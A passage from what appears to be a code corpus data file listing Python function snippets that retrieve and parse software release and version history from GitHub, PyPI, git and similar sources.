xrange(len(tags)):\n if i >= start:\n parts = tags[i]['ref'].split('/')\n release_num = parts[2]\n sha = tags[i]['object']['sha']\n tag = [release_num, sha]\n latest.append(tag)\n return latest", "def get_release(request):\r\n\r\n release = raven.fetch_git_sha(os.path.dirname(os.path.dirname(__file__)))\r\n return HttpResponse(json.dumps({\"release\": release[:7]}))", "def releases():\n r = run('ls -x %(releases_path)s' % env)\n env.releases = sorted(r.split(\"\\t\"))\n if len(env.releases) >= 1:\n env.current_revision = env.releases[-1]\n env.current_release = '%(releases_path)s/%(current_revision)s' % env\n if len(env.releases) > 1:\n env.previous_revision = env.releases[-2]\n env.previous_release = '%(releases_path)s/%(previous_revision)s' % env\n\n #cleanup old releases. 
max 3 allowed.\n cleanup()", "def get_recent_release_from_product_details() -> int:\n rls_prod_details_json = get(\n \"https://product-details.mozilla.org/1.0/firefox_history_major_releases.json\"\n ).json()\n rls_prod_details = Series(rls_prod_details_json).sort_values(ascending=True)\n [(cur_rls_vers, _date)] = rls_prod_details[-1:].iteritems()\n cur_rls_maj, *_v = cur_rls_vers.split(\".\")\n return int(cur_rls_maj)", "def _parse_latest_update(self, resp: Dict[str, Any], latest_version: str) -> str:\n latest_release = resp.get(\"releases\", {}).get(latest_version)\n if latest_release is not None and isinstance(latest_release, list):\n release_artifact_dates = []\n for artifact in latest_release:\n try:\n upload_time = artifact.get(\"upload_time_iso_8601\")\n parsed_upload_time = dateutil.parser.isoparse(upload_time)\n release_artifact_dates.append(parsed_upload_time)\n except Exception:\n pass\n latest_artifact_timestamp = max(release_artifact_dates)\n return latest_artifact_timestamp.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n return \"\"", "def get_version():\n parent_dir = os.path.dirname(os.path.realpath(__file__))\n while True:\n if '.git' in os.listdir(parent_dir):\n break\n parent_dir = os.path.dirname(parent_dir)\n git_log = os.path.join(parent_dir,'.git','logs','HEAD')\n handle = open(git_log,'r')\n log_lines = [l.split('\\t') for l in handle.readlines()]\n #now get latest github commit\n url = 'https://api.github.com/repos/thomasvangurp/epiGBS/commits'\n context = ssl._create_unverified_context()\n result = json.load(urllib.urlopen(url,context=context))\n print('')", "def get_released_versions(package_name):\n url = \"https://pypi.python.org/pypi/{}/json\".format(package_name)\n data = json.load(urllib.request.urlopen(url))\n\n versions = {\n # We can actually select any element in `dist_files` because all the distribution files\n # should have almost the same upload time.\n version: dist_files[0][\"upload_time\"]\n for version, dist_files in data[\"releases\"].items()\n # If len(dist_files) = 0, this release is unavailable.\n # Example: https://pypi.org/project/xgboost/0.7\n #\n # > pip install 'xgboost==0.7'\n # ERROR: Could not find a version that satisfies the requirement xgboost==0.7\n if len(dist_files) > 0 and (not dist_files[0].get(\"yanked\", False))\n }\n return versions", "def releases():\n result = run('ls %(releases_dir)s' % env)\n releases_list = re.split('\\s+', result)\n releases_list.sort(reverse=True)\n return releases_list", "def get_release_notes(self):\n\n notes = self.output.get_header('RELEASE NOTES')\n notes += 'https://{}/{}/{}/releases'.format(HOST_GITHUB, \\\n self.repo, self.product) + '\\n'\n\n notes += self.output.get_sub_header('COMPARISONS')\n notes += self.get_comparison(self.latest_tags[0][VERS],\n self.latest_tags[1][VERS])\n\n if len(self.latest_tags) >= (MAX_COMPARISONS_TO_SHOW - 1):\n notes += self.get_comparison(self.latest_tags[1][VERS],\n self.latest_tags[2][VERS])\n\n if len(self.latest_tags) >= MAX_COMPARISONS_TO_SHOW:\n notes += self.get_comparison(self.latest_tags[2][VERS],\n self.latest_tags[3][VERS])\n\n tag_data = self.get_tag(self.latest_tags[3][SHA])\n\n notes += self.output.get_sub_header('TAGS')\n notes += self.get_url_tag_release(self.latest_tags[3][VERS]) + '\\n'\n notes += self.get_url_tag_commit(tag_data[\"object\"][\"sha\"]) + '\\n'\n\n changelog = self.get_changelog(tag_data[\"object\"][\"sha\"])\n if changelog:\n notes += self.output.get_sub_header('CHANGELOG')\n notes += changelog\n return notes", "def 
get_release_info(version='v1.1-dev', date='2021-07-22'):\n # go to the repository directory\n dir_orig = os.getcwd()\n os.chdir(os.path.dirname(os.path.dirname(__file__)))\n\n # grab git info into string\n try:\n cmd = \"git describe --tags\"\n version = subprocess.check_output(cmd.split(), stderr=subprocess.DEVNULL)\n version = version.decode('utf-8').strip()\n\n # if there are new commits after the latest release\n if '-' in version:\n version, num_commit = version.split('-')[:2]\n version += '-{}'.format(num_commit)\n\n cmd = \"git log -1 --date=short --format=%cd\"\n date = subprocess.check_output(cmd.split(), stderr=subprocess.DEVNULL)\n date = date.decode('utf-8').strip()\n except:\n pass\n\n # go back to the original directory\n os.chdir(dir_orig)\n return version, date", "def get_version_and_release_date(\n requirement, version=None, verbose=False, response=None\n):\n if not response:\n url = get_pypi_url(requirement, version)\n response = request(url)\n\n # see if the url is 404'ing because it has been redirected\n if response.status == 404:\n root_url = url.rpartition(\"/\")[0]\n res = request(root_url, method=\"HEAD\")\n if res.status == 301:\n new_location = res.headers[\"location\"] + \"/json\"\n response = request(new_location)\n\n if response.status != 200:\n if version:\n if verbose:\n print(\n \"{} ({}) isn't available on PyPI \"\n \"anymore!\".format(requirement, version)\n )\n else:\n if verbose:\n print(\n \"{} isn't on PyPI. Check that the project \"\n \"still exists!\".format(requirement)\n )\n return None, None\n\n if not response.json:\n if verbose:\n print(\n \"Decoding the JSON response for {} ({}) \"\n \"failed\".format(requirement, version)\n )\n return None, None\n\n response = response.json\n\n try:\n if version:\n if version in response[\"releases\"]:\n release_date = response[\"releases\"][version][0][\"upload_time\"]\n else:\n return None, None\n else:\n version = response[\"info\"].get(\"stable_version\")\n\n if not version:\n versions = {\n v: parse_version(v)\n for v in response[\"releases\"].keys()\n if not parse_version(v).is_prerelease()\n }\n\n # if we still don't have a version, let's pick up a prerelease one\n if not versions:\n versions = {\n v: parse_version(v) for v in response[\"releases\"].keys()\n }\n\n if versions:\n version = max(versions.items(), key=operator.itemgetter(1))[0]\n release_date = response[\"releases\"][str(version)][0][\"upload_time\"]\n else:\n return None, None\n\n return version, datetime.fromtimestamp(\n time.mktime(time.strptime(release_date, \"%Y-%m-%dT%H:%M:%S\"))\n )\n except IndexError:\n if verbose:\n print(\"{} ({}) didn't return a date property\".format(requirement, version))\n return None, None", "def get_releases(is_vertebrate: bool):\n url = \"http://ftp.ensemblgenomes.org/pub?\"\n if is_vertebrate:\n url = \"http://ftp.ensembl.org/pub?\"\n ret = retry(requests.get, 3, url)\n # sort releases new to old\n releases = sorted(\n [int(i) for i in re.findall(r'\"release-(\\d+)/\"', ret.text)],\n reverse=True,\n )\n if is_vertebrate:\n # ignore immature releases\n releases = [r for r in releases if r > 46]\n return releases", "def api_json(self):\n if not self._api_json:\n resp = requests.get(\n GitHubManager.RELEASE_API.format(repo=self.repo)\n )\n if not resp.ok:\n resp.raise_for_status()\n\n self._api_json = resp.json()\n\n return self._api_json", "def certifiVersions():\n log = logger.new(function='certifiVersions')\n r = yield treq.get('https://pypi.python.org/pypi/certifi/json', timeout=5)\n log.msg(\"got 
certifi versions!\")\n data = yield r.json()\n\n # Note: this takes advantage of the fact that certifi's releases have the\n # same version number sort order as lexicographical. If that changes,\n # this will break.\n releases = sorted(data[u'releases'].keys())\n\n first_release = releases.index('14.05.14')\n target_versions = releases[first_release:]\n\n result = []\n for version in target_versions:\n files = data[u'releases'][version]\n\n # Find the .tar.gz release.\n for file in files:\n if file[u'filename'].endswith(u'.tar.gz'):\n break\n else:\n continue\n\n log.msg(\"new release located\", version=version, tarball=file[u'url'])\n result.append((version, file[u'url']))\n\n returnValue(result)", "def get_releases(repo, quiet=False, per_page=None) -> List[str]:\n req_url = f\"https://api.github.com/repos/{owner}/{repo}/releases\"\n\n params = {}\n if per_page is not None:\n if per_page < 1 or per_page > 100:\n raise ValueError(\"per_page must be between 1 and 100\")\n params[\"per_page\"] = per_page\n\n request = get_request(req_url, params=params)\n num_tries = 0\n while True:\n num_tries += 1\n try:\n with urllib.request.urlopen(request, timeout=10) as resp:\n result = resp.read()\n break\n except urllib.error.HTTPError as err:\n if err.code == 401 and os.environ.get(\"GITHUB_TOKEN\"):\n raise ValueError(\"GITHUB_TOKEN env is invalid\") from err\n elif err.code == 403 and \"rate limit exceeded\" in err.reason:\n raise ValueError(\n f\"use GITHUB_TOKEN env to bypass rate limit ({err})\"\n ) from err\n elif err.code in (404, 503) and num_tries < max_http_tries:\n # GitHub sometimes returns this error for valid URLs, so retry\n print(f\"URL request {num_tries} did not work ({err})\")\n continue\n raise RuntimeError(f\"cannot retrieve data from {req_url}\") from err\n\n releases = json.loads(result.decode())\n if not quiet:\n print(f\"found {len(releases)} releases for {owner}/{repo}\")\n\n avail_releases = [\"latest\"]\n avail_releases.extend(release[\"tag_name\"] for release in releases)\n return avail_releases", "def get_releases(platform, year, month):\n platform_num = PLATFORMS.get(platform.lower(), 0)\n\n if platform_num == 0:\n url = _3DJUEGOS_RELEASES_URL + \"todos/por-mes/0/{}/{}/\".format(year, month)\n else:\n url = _3DJUEGOS_RELEASES_URL + platform + \\\n \"/por-mes/{}/{}/{}/\".format(platform_num, year, month)\n\n soup = get_soup_obj(url)\n if not soup:\n return None\n results = {}\n results[\"games\"] = []\n root = soup.find(\"div\", {\"class\": \"pad_rl10\"})\n for div in root.findAll(\"div\"):\n if div.attrs[\"class\"] == [\"s20\", \"ffnav\", \"b\", \"mar_t50\"]:\n release_date = \"{}-{}-{}\".format(year, month,\n re.search(r'\\d+', div.span.text).group())\n elif div.attrs[\"class\"] == [\"dtc\", \"vam\"]:\n name = div.a.span.text\n platform = div.div.span.text\n results[\"games\"].append(\n {\"name\": name, \"platform\": platform, \"releaseDate\": release_date})\n\n return results", "def list_releases(self, name):\n endpoint = '/v1/charm/{}/releases'.format(name)\n response = self._client.get(endpoint)\n\n channel_map = []\n for item in response['channel-map']:\n expires_at = item['expiration-date']\n if expires_at is not None:\n # `datetime.datetime.fromisoformat` is available only since Py3.7\n expires_at = parser.parse(expires_at)\n channel_map.append(\n Release(revision=item['revision'], channel=item['channel'], expires_at=expires_at))\n\n channels = [\n Channel(\n name=item['name'],\n fallback=item['fallback'],\n track=item['track'],\n risk=item['risk'],\n 
branch=item['branch'],\n ) for item in response['package']['channels']]\n\n revisions = [_build_revision(item) for item in response['revisions']]\n\n return channel_map, channels, revisions", "def get_from_releases(releases: List[Tuple[str, str, str]]) -> List[str]:\n output = []\n client = redis.Redis(host=os.environ.get('REDIS_HOST', 'localhost'))\n\n for release in releases:\n key_name = _title_to_key(release[0])\n url = client.get(key_name)\n\n if url is not None:\n output.append('<a href=\"https://horriblesubs.info{url}\">{0}</a> – {2}'.format(*release, url=url.decode()))\n\n else:\n output.append(''.join(release))\n\n return output", "def extract_release_data(self):\r\n data = None\r\n session = self.get_session()\r\n project = session.create(self._config.name)\r\n \r\n session.home = self._config['dir']\r\n \r\n result = self.__find_project(project)\r\n if (result != None) and (self._config.get_boolean('releasable', False)):\r\n if 'baseline.release' in self._config:\r\n data = {}\r\n _logger.info(\"Releasing: '%s'\" % result)\r\n data['name'] = result.objectname\r\n data['database'] = session.database()\r\n data['role'] = ccm.get_role_for_purpose(session, str(self._config['purpose']))\r\n data['dir'] = os.path.normpath(self._config['dir'])\r\n data['pst'] = result.name\r\n data['release'] = self._config['baseline.release']\r\n else:\r\n _logger.warning(\"Could not release \" + result.objectname + \" because the 'baseline.release' property is missing.\")\r\n return data", "def get_bookable_releases(context, data_dict):\n # noinspection PyUnresolvedReferences\n frc = _get_or_bust(data_dict, 'frc')\n\n lc = ckanapi.LocalCKAN(context=context)\n\n results = lc.action.package_search(\n q='frc:{frc} AND type:publication'.format(\n frc=frc\n ),\n fl=[\n 'product_id_new',\n 'title'\n ]\n )\n\n final_results = []\n for result in results['results']:\n article_results = lc.action.package_search(\n q=(\n 'top_parent_id:{pid} '\n # Only \"Working Copy\" results.\n 'AND status_code:31 '\n # With a release_date set to anything (not blank)\n 'AND last_release_date:[* TO *] '\n 'AND type:article'\n ).format(\n pid=result['product_id_new']\n ),\n sort='issue_number_int asc',\n # FIXME: We need to actually paginate on this, but the daily\n # team will not accept it (yet).\n rows=2000000\n )\n\n for art_result in article_results['results']:\n final_results.append({\n 'productId': result['product_id_new'],\n 'issue': art_result['issue_number_int'],\n 'title': result['title'],\n 'refper': result['reference_period']\n })\n\n return final_results", "def get_release_files(tag_name, config) -> Tuple[List[ReleaseFile], Dict[str, SourceFile]]:\n\n @retry_multi(5)\t# retry at most 5 times\n def execute_request(path):\n \"\"\"!\n @brief Performs a GET request with the given path. 
To be used with Github's REST API.\n @returns If successful, returns a .JSON object\n \"\"\"\n headers = {\n \"Accept\": \"application/vnd.github.v3+json\"\n }\n url = \"https://api.github.com\" + path\n\n # GET https://api.github.com/<path> Accept: \"application/vnd.github.v3+json\"\n\n response = requests.get(url, headers=headers, timeout=GLOBAL_TIMEOUT)\n\n response.raise_for_status() # Raise a RequestException if we failed, and trigger retry\n\n return response.json()\n\n build_group_regex = re.compile(\"fs2_open_.*-builds-([^.-]*)(-([^.]*))?.*\") # regex for matching binary .zip's and .7z's\n source_file_regex = re.compile(\"fs2_open_.*-source-([^.]*)?.*\") # regex for matching source .zip's and .7z's\n\n # Get the github release metadata of the given tag name\n response = execute_request(\n \"/repos/{}/releases/tags/{}\".format(config[\"github\"][\"repo\"], tag_name))\n\n # Extract the binary and source files from the response[\"asset\"] metadata\n binary_files = []\n source_files = {}\n for asset in response[\"assets\"]:\n url = asset[\"browser_download_url\"]\n name = asset[\"name\"]\n\n group_match = build_group_regex.match(name)\n\n if group_match is not None:\n platform = group_match.group(1)\n # x64 is the Visual Studio name but for consistency we need Win64\n if platform == \"x64\":\n platform = \"Win64\"\n\n binary_files.append(ReleaseFile(name, url, platform, group_match.group(3)))\n else:\n group_match = source_file_regex.match(name)\n\n if group_match is None:\n continue\n\n group = group_match.group(1)\n\n source_files[group] = SourceFile(name, url, group)\n\n binary_files.sort(key=lambda ReleaseFile: ReleaseFile.name)\n\n return binary_files, source_files", "async def get_releases(\n self, prerelease: bool = False, returnlimit: int = 5\n ) -> [\"AIOGitHubAPIRepositoryRelease\"] or list:\n _endpoint = f\"/repos/{self.full_name}/releases\"\n\n response = await self.client.get(endpoint=_endpoint)\n contents = []\n\n for content in response or []:\n if len(contents) == returnlimit:\n break\n if not prerelease:\n if content.get(\"prerelease\", False):\n continue\n contents.append(AIOGitHubAPIRepositoryRelease(content))\n\n return contents", "def get_release(repo, tag=\"latest\", quiet=False) -> dict:\n api_url = f\"https://api.github.com/repos/{owner}/{repo}\"\n req_url = (\n f\"{api_url}/releases/latest\"\n if tag == \"latest\"\n else f\"{api_url}/releases/tags/{tag}\"\n )\n request = get_request(req_url)\n releases = None\n num_tries = 0\n\n while True:\n num_tries += 1\n try:\n with urllib.request.urlopen(request, timeout=10) as resp:\n result = resp.read()\n remaining = int(resp.headers[\"x-ratelimit-remaining\"])\n if remaining <= 10:\n warnings.warn(\n f\"Only {remaining} GitHub API requests remaining \"\n \"before rate-limiting\"\n )\n break\n except urllib.error.HTTPError as err:\n if err.code == 401 and os.environ.get(\"GITHUB_TOKEN\"):\n raise ValueError(\"GITHUB_TOKEN env is invalid\") from err\n elif err.code == 403 and \"rate limit exceeded\" in err.reason:\n raise ValueError(\n f\"use GITHUB_TOKEN env to bypass rate limit ({err})\"\n ) from err\n elif err.code == 404:\n if releases is None:\n releases = get_releases(repo, quiet)\n if tag not in releases:\n raise ValueError(\n f\"Release {tag} not found (choose from {', '.join(releases)})\"\n )\n elif err.code == 503 and num_tries < max_http_tries:\n # GitHub sometimes returns this error for valid URLs, so retry\n warnings.warn(f\"URL request {num_tries} did not work ({err})\")\n continue\n raise 
RuntimeError(f\"cannot retrieve data from {req_url}\") from err\n\n release = json.loads(result.decode())\n tag_name = release[\"tag_name\"]\n if not quiet:\n print(f\"fetched release {tag_name!r} info from {owner}/{repo}\")\n\n return release", "def _grab_history(self):\n self.data['history_lines'] = []\n self.data['history_file'] = None\n self.data['history_encoding'] = None\n self.data['headings'] = []\n self.data['history_last_release'] = ''\n self.data['history_insert_line_here'] = 0\n default_location = None\n config = self.setup_cfg.config\n if config and config.has_option('zest.releaser', 'history_file'):\n default_location = config.get('zest.releaser', 'history_file')\n history_file = self.vcs.history_file(location=default_location)\n self.data['history_file'] = history_file\n if not history_file:\n logger.warn(\"No history file found\")\n return\n logger.debug(\"Checking %s\", history_file)\n history_lines, history_encoding = read_text_file(history_file)\n history_lines = history_lines.split('\\n')\n headings = utils.extract_headings_from_history(history_lines)\n if not headings:\n logger.warn(\"No detectable version heading in the history \"\n \"file %s\", history_file)\n return\n self.data['history_lines'] = history_lines\n self.data['history_encoding'] = history_encoding\n self.data['headings'] = headings\n\n # Grab last header.\n start = headings[0]['line']\n if len(headings) > 1:\n # Include the next header plus underline, as this is nice\n # to show in the history_last_release.\n end = headings[1]['line'] + 2\n else:\n end = len(history_lines)\n history_last_release = '\\n'.join(history_lines[start:end])\n self.data['history_last_release'] = history_last_release\n\n # Add line number where an extra changelog entry can be inserted. Can\n # be useful for entry points. 
'start' is the header, +1 is the\n # underline, +2 is probably an empty line, so then we should take +3.\n # Or rather: the first non-empty line.\n insert = start + 2\n while insert < end:\n if history_lines[insert].strip():\n break\n insert += 1\n self.data['history_insert_line_here'] = insert", "def get_history():\n return response_texts_to_entries(make_post_request(HISTORY_API, data={\"k\": config[\"api_key\"]}))", "def extract_release_data(self):\r\n data = None\r\n session = self.get_session()\r\n project = session.create(self._config.name)\r\n \r\n session.home = self._config['dir']\r\n \r\n if self._config.get_boolean('releasable', False):\r\n if 'baseline.release' in self._config:\r\n data = {}\r\n _logger.info(\"Releasing: '%s'\" % project)\r\n data['name'] = project.objectname\r\n data['database'] = session.database()\r\n data['role'] = ccm.get_role_for_purpose(session, str(self._config['purpose']))\r\n data['dir'] = os.path.normpath(self._config['dir'])\r\n data['pst'] = project.name\r\n data['release'] = self._config['baseline.release']\r\n else:\r\n _logger.warning(\"Could not release \" + project + \" because the 'baseline.release' property is missing.\")\r\n return data", "async def fetch_data(self) -> GitHubReleaseModel | None:\n result = await self._client.repos.releases.list(\n self.repository, **{\"params\": {\"per_page\": 1}}\n )\n if not result.data:\n return None\n\n for release in result.data:\n if not release.prerelease:\n return release\n\n # Fall back to the latest release if no non-prerelease release is found\n return result.data[0]", "def versions(self) -> List['RadsProjectVersion']:\n logger.debug(f\"retrieve versions of {self}\")\n listing = self.storage.request_text(f\"{self.path}/releaselisting\")\n return [RadsProjectVersion(self, RadsVersion(l)) for l in listing.splitlines()]", "def post_import():\n\n validate_request_json(request)\n\n releases = []\n for r in request.json:\n # Get the platform, create if it doesn't exist\n platforms = []\n for p in r['platforms']:\n try:\n query = db.session.query(Platform).filter(Platform.name == p)\n platform = query.one()\n except exc.NoResultFound:\n app.logger.info(\"Creating platform {}\".format(p))\n platform = Platform(p)\n db.session.add(platform)\n platforms.append(platform)\n\n release = Release(\n platforms=platforms,\n user=r['user'],\n team=r.get('team'),\n references=json.dumps(r.get('references')),\n )\n\n release.stime = arrow.get(r['stime']) if r.get('stime') else None\n release.ftime = arrow.get(r['ftime']) if r.get('ftime') else None\n if release.ftime and release.stime:\n release.duration = release.ftime - release.stime\n\n notes = r.get('notes')\n if notes:\n for n in notes:\n note = ReleaseNote(release.id, n)\n db.session.add(note)\n\n for p in r['packages']:\n package = Package(\n release_id=release.id,\n name=p['name'],\n version=p['version'],\n )\n\n package.rollback = p.get('rollback')\n package.status = p.get('status')\n package.diff_url = p.get('diff_url')\n\n if p.get('stime'):\n package.stime = arrow.get(p['stime'])\n else:\n package.stime = arrow.get(r['stime'])\n package.ftime = arrow.get(p['ftime']) if p.get('ftime') else None\n if package.stime and package.ftime:\n package.duration = package.ftime - package.stime\n\n db.session.add(package)\n\n db.session.add(release)\n db.session.commit()\n\n releases.append(release.id)\n\n return jsonify({'releases': [str(x) for x in releases]}), 200", "def ls(_):\n client = utils.s3_client()\n\n projects = []\n\n config = utils.get_config()\n bucket = 
config[\"release\"][\"s3_bucket\"]\n deploys = config[\"deploy\"]\n\n resp = client.list_objects_v2(Bucket=bucket)\n for data in resp.get(\"Contents\", []):\n name = data[\"Key\"]\n\n projects.append(name)\n\n projects = sorted(projects)\n\n _projects = []\n\n for name in projects:\n try:\n release = get_release(client, bucket, name)\n except InvalidRelease:\n continue\n\n data = {\n \"Name\": name,\n \"Latest Release\": f\"v{release.version} {release.timestamp} ({release.commit})\",\n }\n\n for env_name, cfg in deploys.items():\n env_version, env_commit, env_timestamp = get_deployed_version(\n client, cfg[\"s3_bucket\"], name\n )\n\n data[env_name.title()] = f\"v{env_version} {env_timestamp} ({env_commit})\"\n\n _projects.append(data)\n\n projects = _projects\n\n utils.printfmt(projects)", "def get_last_release_id():\n url = \"https://api.github.com/repos/yt-dlp/yt-dlp/releases/latest\"\n try:\n with urlopen(url, timeout=10) as resp:\n return json.loads(resp.read().decode(\"utf-8\")).get(\"tag_name\", \"0\")\n except URLError as e:\n log(f\"YouTubeDLHelper error [get last release id]: {e}\")", "def test_yum_history(self):\n repo_history = ospsurvey.probes.software.get_yum_history()\n\n print(\"Yum History: {}\".format(json.dumps(repo_history)))", "def BPM_PROVHISTORY():\n return download_from_archive(\"bpm_20220128_gmos-s_Ham_11_full_12amp.fits\")", "def test_get_all_available_release_updates(self):\n self._ucr({\n 'repository/online/component/a': 'yes',\n 'repository/online/component/a/version': 'current',\n })\n self._uri({\n '%d.%d/maintained/%d.%d-%d/all/Packages.gz' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): DATA,\n '%d.%d/maintained/component/%s/all/Packages.gz' % (MAJOR, MINOR + 1, 'a'): DATA,\n '%d.%d/maintained/%d.%d-%d/all/Packages.gz' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): DATA,\n })\n versions, component = self.u.get_all_available_release_updates()\n self.assertEqual(['%d.%d-%d' % (MAJOR, MINOR + 1, 0)], versions)\n self.assertEqual('a', component)", "def get_release_info(self):\r\n return self.detail_info.get_release_info(self.version)", "def get_versions():\n ret_obj = {'versions': picard_versions(current_app)}\n return make_response(jsonify(ret_obj), 200)", "def latest_github_release(username: str, repo: str) -> GitHubReleaseResponse:\n url = f'https://api.github.com/repos/{username}/{repo}/releases/latest'\n response = requests.get(url)\n if response.status_code != 200:\n print(f'Error: {response.status_code}', file=sys.stderr)\n sys.exit(1)\n try:\n decoded_json = response.json()\n return GitHubReleaseResponse(decoded_json)\n except requests.exceptions.JSONDecodeError:\n print('Error: Unable to parse JSON from GitHub releases', file=sys.stderr)\n sys.exit(1)", "def get(package):\n url = Pypi.url()\n url = url.format(package=package)\n\n # Request Pypi\n resp = requests.get(url)\n if resp.status_code != requests.codes.ok:\n return dict(status=\"failure\", message=\"Invalid Package\")\n\n data = dict()\n resp = resp.json()\n releases = resp.get(\"releases\", [])\n data[\"releases\"] = releases\n data[\"status\"] = \"success\"\n\n return data", "def get_linked_versions(version='current'):\n version = check_version_str(version)\n chapters = [10, 9, 8]\n version_page = 'https://research.cs.wisc.edu/htcondor/manual/{ver}/{chapter}_Version_History.html'\n r = requests.get(version_page.format(ver=version, chapter=chapters[0]))\n if r.status_code == 404:\n # Try different chapter numbers, as it changes for different versions\n i = 1\n while r.status_code == 404 and i < 
len(chapters):\n r = requests.get(version_page.format(ver=version, chapter=chapters[i]))\n i += 1\n if r.status_code == 404:\n return []\n soup_vers = bs4.BeautifulSoup(r.text, 'lxml')\n versions = [x.text.replace('Version ', '')\n for x in soup_vers.find_all('a')\n if x.text.startswith('Version')]\n return versions", "def get_build_infos(self, start_rev, end_rev, range=60*60*4):\n pushlogs_finder = self._create_pushlog_finder(start_rev, end_rev)\n\n pushlogs = pushlogs_finder.get_pushlogs()\n\n if not pushlogs:\n return []\n\n start_time = pushlogs[0]['date']\n end_time = pushlogs[-1]['date']\n \n build_urls = [(\"%s%s/\" % (self.build_base_url, path), timestamp)\n for path, timestamp in self._extract_paths()]\n\n build_urls_in_range = filter(lambda (u, t): t > (start_time - range)\n and t < (end_time + range), build_urls)\n\n raw_revisions = [push['changesets'][-1] for push in pushlogs]\n all_builds = []\n with futures.ThreadPoolExecutor(max_workers=8) as executor:\n futures_results = {}\n for build_url, timestamp in build_urls_in_range:\n future = executor.submit(self._get_valid_builds,\n build_url,\n timestamp,\n raw_revisions)\n futures_results[future] = build_url\n for future in futures.as_completed(futures_results):\n if future.exception() is not None:\n sys.exit(\"Retrieving valid builds from %r generated an\"\n \" exception: %s\" % (futures_results[future],\n future.exception()))\n all_builds.extend(future.result())\n\n return self._sort_builds(all_builds)", "def get_releases_by_application(self, application_id):\n status_code_dict = {codes.ok: ReleaseListResponse}\n return self.get_request(RELEASES_URL.format(application_id=application_id),\n status_code_response_class_dict=status_code_dict)", "def get_release_data(user, repo, field=None, regex_pattern=None, group_number=0):\n response = requests.get(f\"https://api.github.com/repos/{user}/{repo}/releases/latest\")\n release_data_dict = json.loads(response.text)\n\n if field:\n field_value = release_data_dict[field]\n if regex_pattern is None:\n output = field_value\n else:\n output = re.search(regex_pattern, field_value).group(group_number)\n else:\n output = release_data_dict\n\n return output", "def cache_from_releases(releases: List[dict]) -> None:\n client = redis.Redis(host=os.environ.get('REDIS_HOST', 'localhost'))\n\n for release in (r for r in releases if r.get('url')): # filter out releases without a url\n key_name = _title_to_key(release['title'])\n client.setex(key_name, ONE_DAY, release['url'])", "def get_versions(self):\n # They randomly use and don't use 'r' prefix so we have to sort\n # versions manually\n versions = list(self._get_github_tags())\n versions.sort(\n key=operator.attrgetter('base_version'),\n reverse=True,\n )\n return versions", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def list_releases(\n self,\n ) -> Callable[\n [cloud_deploy.ListReleasesRequest], cloud_deploy.ListReleasesResponse\n ]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"list_releases\" not in self._stubs:\n self._stubs[\"list_releases\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/ListReleases\",\n request_serializer=cloud_deploy.ListReleasesRequest.serialize,\n 
response_deserializer=cloud_deploy.ListReleasesResponse.deserialize,\n )\n return self._stubs[\"list_releases\"]", "def software_releases_repository():\n\n pipelines = [ingest_pipeline, populate_dm_pipeline, asset_experimentation]\n schedules = [] # [my_hourly_schedule]\n sensors = [] # [my_sensor]\n\n return pipelines + schedules + sensors", "def gettime(self, tag):\n cmd = ['git', 'log', '--pretty=format:\"%ct\"', \"-1\", tag]\n p = Popen(cmd, cwd=self.filename, stdout=PIPE)\n data, res = p.communicate()\n if data == b'':\n return [], []\n time_stamp = []\n this_tag = []\n for seconds in data.decode(\"utf-8\").split(\"\\n\"):\n month = round((int(seconds.strip('\"')) - ReleaseTime.base) / ReleaseTime.month_time)\n if month not in time_stamp:\n time_stamp.append(month)\n this_tag.append(tag[0:4])\n else:\n pass\n return time_stamp, this_tag", "def release_dates(self, **kwargs):\n path = self._get_movie_id_path('release_date')\n resp = self._get_method(path, kwargs)\n return resp", "def _parse_release_count(self, resp: Dict[str, Any]) -> str:\n return f\"{len(resp.get('releases', []))}\"", "def get_release_info(self, release):\n rel_os = release.operating_system.lower()\n version = release.version\n\n release_info = filter(\n lambda r: (\n r['os'] == rel_os and\n ClusterPlugins.is_release_version_compatible(version,\n r['version'])),\n self.plugin.releases)\n\n return release_info[0]", "def aggregate_git_log(path, progress_callback=lambda progress: None):\n versions = list()\n\n current_version, current_commits = None, list()\n\n log_data = git_log_hash(path)\n log_length = len(log_data)\n progress_step = max(1, log_length / 100)\n \n for idx, (rev_hash, date, msg) in enumerate(log_data):\n if idx % progress_step == 0:\n progress_callback(float(idx) / log_length)\n \n current_commits.append(msg)\n if git_checkout(path=path, revision_hash=rev_hash):\n version = get_package_metadata(path=path, field_name='Version')\n if version != current_version:\n # memorize it\n versions.insert(0,\n dict(version=version,\n date=datetime.strptime(date.rsplit(' ', 1)[0], '%Y-%m-%d %H:%M:%S'),\n sections=[dict(notes='',\n items=list(reversed(current_commits)))]))\n\n current_version, current_commits = version, list()\n\n if current_commits:\n versions.insert(0,\n dict(version='newest',\n date=None,\n sections=[dict(notes='',\n items=list(reversed(current_commits)))]))\n\n return versions", "def get_history_queue():\n response = houston.get(\"/history/queue\")\n houston.raise_for_status_with_json(response)\n return response.json()", "def versions():\n result = timeline.versions()\n if result:\n click.echo('\\n'.join(result))", "def git_stats_release(project: Project, release: Release) -> GitStats:\n return _git_stats(project, f\"{release.tag_name}~1\", release.tag_name)", "def get_recent_release_for_page(self, page, PER_PAGE):\n\t\tconnection = self.connect_to_db()\n\t\tcursor = connection.cursor()\n\t\toffset = (page - 1) * 15\n\t\tcursor.execute('''select * from movies where release_year = 2016 order by weighted desc limit %d offset %d;''' % (PER_PAGE, offset))\n\t\trows = cursor.fetchall()\n\t\tconnection.close()\n\t\treturn self.convert_to_json(rows)", "def universePayoutHistory(universeId, startDate, endDate):\n url = f\"https://engagementpayouts.roblox.com/v1/universe-payout-history?endDate={endDate}&startDate={startDate}&universeId={universeId}\"\n r = requests.get(url, cookies=cookie)\n j = json.loads(r.text)\n return j", "def history(self) -> List[Dict[str, Any]]:\n\n response = 
